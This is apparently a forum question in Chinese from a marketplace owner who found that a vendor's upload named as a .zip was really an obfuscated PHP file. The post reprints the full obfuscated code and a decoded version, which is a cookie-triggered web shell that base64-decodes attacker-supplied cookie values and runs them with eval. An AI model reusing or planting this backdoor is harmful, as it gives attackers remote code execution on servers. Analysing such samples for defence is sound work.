我拥有一个数字商品交易市场,有一个供应商上传了这个文件,它是一个zip文件,但在Windows上显示为损坏的。当我在Linux中打开它时,我震惊地发现这个文件本身是一个php文件,有人添加了.zip扩展名。
有人见过这样的代码吗?谁能帮我理解它?它是否恶意?
<?php
$pljd="ynvwnKynvcpLCBqb2luKGFynvcmF5X3NsaWNlKCRhLCRjKCRnvhKS0zKSkpKSk7ZWNobyAnPnvC8nLnviRrLic+Jzt9";
$seld="ZXBnvsYnvWNlKGFycmF5KCcvnvWnv15cdz1nvcc10nvvJywnL1xznvLycnvpLCBhcnJheSgnJ";
$cyvj = str_replace("w","","wswtwrw_wrwepwlwacwe");
$qxau="GEpPjMpnveyRrPSdzZXJhdGknO2VjaG8gnvJzwnLiRnvrLic+JznvtldnvmFsKnvGnvJhc2U2NF9kZWNvZGnvUocHJlZ19nvy";
$gewk="JGnvM9J2NvnvdW50JznvskYT0kX0NPT0tJRTnvtpZihyZnvXNldCgknvYSk9PSdtYSnvcgJiYgJGMoJ";
$thyw = $cyvj("bi", "", "bibabisbie64bi_dbiebicbiobidbie");
$iign = $cyvj("x","","xcxrxexaxtxex_funxctixon");
$xzfy = $iign('', $thyw($cyvj("nv", "", $gewk.$qxau.$seld.$pljd))); $xzfy();
?>
这是我从中提取到的内容。
<?php
$pljd="ynvwnKynvcpLCBqb2luKGFynvcmF5X3NsaWNlKCRhLCRjKCRnvhKS0zKSkpKSk7ZWNobyAnPnvC8nLnviRrLic+Jzt9";
$seld="ZXBnvsYnvWNlKGFycmF5KCcvnvWnv15cdz1nvcc10nvvJywnL1xznvLycnvpLCBhcnJheSgnJ";
$cyvj = str_replace("w","","str_replace");
$qxau="GEpPjMpnveyRrPSdzZXJhdGknO2VjaG8gnvJzwnLiRnvrLic+JznvtldnvmFsKnvGnvJhc2U2NF9kZWNvZGnvUocHJlZ19nvy";
$gewk="JGnvM9J2NvnvdW50JznvskYT0kX0NPT0tJRTnvtpZihyZnvXNldCgknvYSk9PSdtYSnvcgJiYgJGMoJ";
$thyw = $cyvj("bi", "", "base64_decode");
$iign = $cyvj("x","","create_function");
$xzfy = $iign('', $thyw($cyvj("nv", "", $gewk.$qxau.$seld.$pljd))); $xzfy();
?>
$xzfy = create_function(base64_decode(JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdtYScgJiYgJGMoJGEpPjMpeyRrPSdzZXJhdGknO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10nJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9))
$c='count';$a=$_COOKIE;if(reset($a)=='ma' && $c($a)>3){$k='serati';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]'','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';}